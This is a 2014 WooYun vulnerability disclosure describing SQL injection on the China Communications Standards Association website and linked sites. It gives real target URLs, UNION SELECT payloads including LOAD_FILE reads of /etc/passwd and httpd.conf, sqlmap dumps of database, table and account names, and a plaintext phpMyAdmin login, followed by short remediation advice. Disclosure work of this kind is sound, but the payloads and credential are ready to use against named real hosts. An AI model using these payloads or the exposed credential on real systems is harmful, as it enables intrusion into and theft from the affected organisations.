当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075549

漏洞标题:中国通信标准化协会以及附带站点SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: Feei

提交时间:2014-09-09 18:49

修复时间:2014-10-24 18:50

公开时间:2014-10-24 18:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-09: 细节已通知厂商并且等待厂商处理中
2014-09-14: 厂商已经确认,细节仅向厂商公开
2014-09-24: 细节向核心白帽子及相关领域专家公开
2014-10-04: 细节向普通白帽子公开
2014-10-14: 细节向实习白帽子公开
2014-10-24: 细节向公众公开

简要描述:

中国通信标准化协会SQL注入,导致服务器上网站全部沦陷

详细说明:

受影响的网站:
通讯标准网
http://www.ptsn.net.cn/
中国通讯标准化协会
http://www.ccsa.org.cn/
中国通讯标准化协会-邮件系统 http://mail.ptsn.net.cn
邮件系统 http://webmail.ccsa.org.cn/
泰尔认证中心 http://www.tlc.com.cn/
全国通信标准化技术委员会 http://www.tc485.cn/
phpMyAdmin http://www.ptsn.net.cn/phpMyAdmin/ 帐号:readall 密码:readall
手工注入
目标链接:http://www.ccsa.org.cn/recorder/display.php?id=726
检测注入:http://www.ccsa.org.cn/recorder/display.php?id=726'

xxx.jpg.png


确定字段数以及字段作用(存在七个字段,第七个字段为跳转链接,第三个为正文):http://www.ccsa.org.cn/recorder/display.php?id=-1 UNION ALL SELECT 1,2,3,3,4,5,NULL

2.JPG.png


当前用户:http://www.ccsa.org.cn/recorder/display.php?id=-1 UNION ALL SELECT NULL,NULL,CONCAT('X',IFNULL(CAST(CURRENT_USER() AS CHAR),'NONE'),'X'),NULL,NULL,NULL,NULL

3.jpg.png

漏洞证明:

接下来交给SQLMAP
数据库:
```
[*] article
[*] auth
[*] ccsa_access_log
[*] article
[*] auth
[*] ccsa_access_log
[*] ccsadoc [目标站点主库]
[*] client_update
[*] customer
[*] del_mladvert
[*] del_ptpic
[*] del_pw_log
[*] del_style
[*] del_test
[*] del_tmparticle
[*] doc
[*] fileopen
[*] ftpusers [FTP用户]
[*] good_member
[*] gsc15
[*] information_schema
[*] IOofCOM
[*] jiaoliu
[*] log
[*] logs
[*] lost+found
[*] maintain
[*] meeting
[*] ml4ccsa
[*] ml4ptsn
[*] mnogosearch
[*] mysql
[*] phpmyadmin [存在PHPMYADMIN http://www.ptsn.net.cn/phpMyAdmin/]
[*] prod
[*] prodex
[*] questionnaire
[*] sales
[*] shenbao
[*] std
[*] std_temp
[*] stdcd
[*] tc485
[*] test
[*] tlc
[*] tspc
[*] userstd
[*] vpopmail [邮件会员:http://webmail.ccsa.org.cn/]
```
主库里的表:
```
Database: ccsadoc
[174 tables]
+------------------------------+
| annex |
| annex2 |
| arch_group |
| archives |
| awardinfo |
| awardlevel |
| baopi |
| baopi_doc |
| baopi_group |
| baopi_reject_log |
| baopi_state |
| baopi_state_log |
| baopi_to_company |
| bpg_question |
| bpggs |
| bpggs_qs |
| bulletin_t |
| ccs |
| ccs_to_ics |
| ccsa_ieee |
| ccsa_tx |
| cert_apply |
| cert_evalution |
| cert_property |
| cert_std |
| city |
| cjk_account |
| cjk_meeting |
| cjk_meeting_docs |
| conference |
| del_annex2tmp |
| del_arch_annex |
| del_attitude |
| del_ccsastd |
| del_comment |
| del_company |
| del_company_to_meeting |
| del_company_type |
| del_config |
| del_contact |
| del_enews |
| del_expert |
| del_images |
| del_jn_article |
| del_jn_articleold |
| del_jn_author |
| del_jn_column |
| del_jn_journal |
| del_jn_no |
| del_mail_mem |
| del_manager |
| del_meeting_expand |
| del_meeting_receipt_bak |
| del_meeting_report |
| del_mem_groupbak |
| del_member_060315 |
| del_memberbak |
| del_ml_subscriber |
| del_mlist_mem |
| del_mt_delegate |
| del_mt_loginlog |
| del_mt_speaklog |
| del_mt_subject |
| del_mt_unitlist |
| del_news_group |
| del_poll |
| del_prjgroup |
| del_prjlist |
| del_prjphase |
| del_project20110517 |
| del_project_to_group20110517 |
| del_project_to_major |
| del_project_to_member |
| del_receipt |
| del_receiptold |
| del_searchtable |
| del_specialist_bk |
| del_specialist_grp_bk |
| del_tc_expert |
| del_unit |
| del_vote |
| del_voteinfo |
| del_votelog |
| del_wireless |
| del_workgroup_lkch |
| disclosure_info |
| dload_log |
| doc_type |
| firstlevel_org |
| hytype |
| ics |
| ieee_download_info |
| images |
| increase_mem_group |
| increase_tcwg |
| innerfile |
| joint_type |
| letter_doc |
| letter_group |
| letters |
| license_info |
| lishi_view |
| maillist |
| manage_regulation |
| meeting |
| meeting_captain |
| meeting_doc |
| meeting_email_log |
| meeting_group |
| meeting_member |
| meeting_members |
| meeting_receipt |
| mem_annex |
| mem_chg_info |
| mem_group |
| member |
| member_type |
| member_view |
| mobileTV_docs |
| mobile_member |
| oplog |
| patent |
| patent_general |
| patent_general_to_tc |
| patent_special |
| prj_department |
| prj_field |
| prj_importance |
| prjclass |
| prjclass_to_baopi_state |
| prjcode |
| prjcode1 |
| prjcode2 |
| project |
| project_change_log |
| project_digest |
| project_old |
| project_plan |
| project_role |
| project_to_company |
| project_to_contact |
| project_to_group |
| project_to_std |
| province |
| qykind |
| recorder |
| ref_type |
| small_com_app |
| specialist |
| specialist_grp |
| specialistgrp |
| std_level |
| std_type |
| submit_baopi |
| suggest |
| suggest_item |
| tc |
| tc11_chg_log |
| tmpmem_annex |
| tmpmem_group |
| tmpmember |
| user_t |
| wengao |
| wg_suggest |
| workfile |
| workgroup |
| worknews |
| worknews_to_tc |
| wx_access_token |
| wx_user |
| zdxm |
| zuc_request |
| zxzz_tmp |
| zxzz_view |
+------------------------------+
```
DB帐号:
```
[*] 'auth_rd'@'localhost'
[*] 'auth_rw'@'localhost'
[*] 'backup'@'%'
[*] 'ccsa_rd'@'localhost'
[*] 'ccsa_rw'@'localhost'
[*] 'doc_rd'@'localhost'
[*] 'doc_rw'@'localhost'
[*] 'ftp'@'127.0.0.1'
[*] 'infosrv'@'localhost'
[*] 'log_rd'@'localhost'
[*] 'log_rw'@'localhost'
[*] 'mailuser'@'%'
[*] 'maint_rw'@'localhost'
[*] 'mepadmin'@'localhost'
[*] 'minfosrv'@'localhost'
[*] 'mlog'@'localhost'
[*] 'mproduct'@'localhost'
[*] 'mptpic'@'localhost'
[*] 'mptqc'@'localhost'
[*] 'mptsn_auth'@'localhost'
[*] 'prod_rd'@'localhost'
[*] 'prod_rw'@'localhost'
[*] 'ptpic'@'localhost'
[*] 'ptpic_rd'@'localhost'
[*] 'ptpic_rw'@'localhost'
[*] 'ptqc'@'localhost'
[*] 'ptqc_rd'@'localhost'
[*] 'ptqc_rw'@'localhost'
[*] 'ptsn_auth'@'localhost'
[*] 'readall'@'localhost'
[*] 'root'@'localhost'
[*] 'shouli'@'localhost'
[*] 'shouli_rd'@'localhost'
[*] 'shouli_rw'@'localhost'
[*] 'std_rd'@'localhost'
[*] 'std_rw'@'localhost'
[*] 'tlcadmin'@'localhost'
[*] 'tlcwebuser'@'localhost'
[*] 'userstd_rw'@'localhost'
[*] 'vpopmail'@'localhost'
```
服务器帐号:
-1 UNION ALL SELECT NULL,NULL,LOAD_FILE('/etc/passwd'),NULL,NULL,NULL,NULL

5.png


WEB配置(查看存在的网站)
-1 UNION ALL SELECT NULL,NULL,LOAD_FILE('/etc/httpd/conf/httpd.conf'),NULL,NULL,NULL,NULL

8.png


phpMyAdmin
http://www.ptsn.net.cn/phpMyAdmin/
帐号:readall 密码:readall
所有的帐号密码都能在程序配置里读取到,所有子站的信息也能读取到.点到为止,没继续下去了!

修复方案:

1.不要将phpMyAdmin放在主站目录下
2.检查全站没有过滤参数的地方并修复

版权声明:转载请注明来源 Feei@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-09-14 12:13

厂商回复:

最新状态:

暂无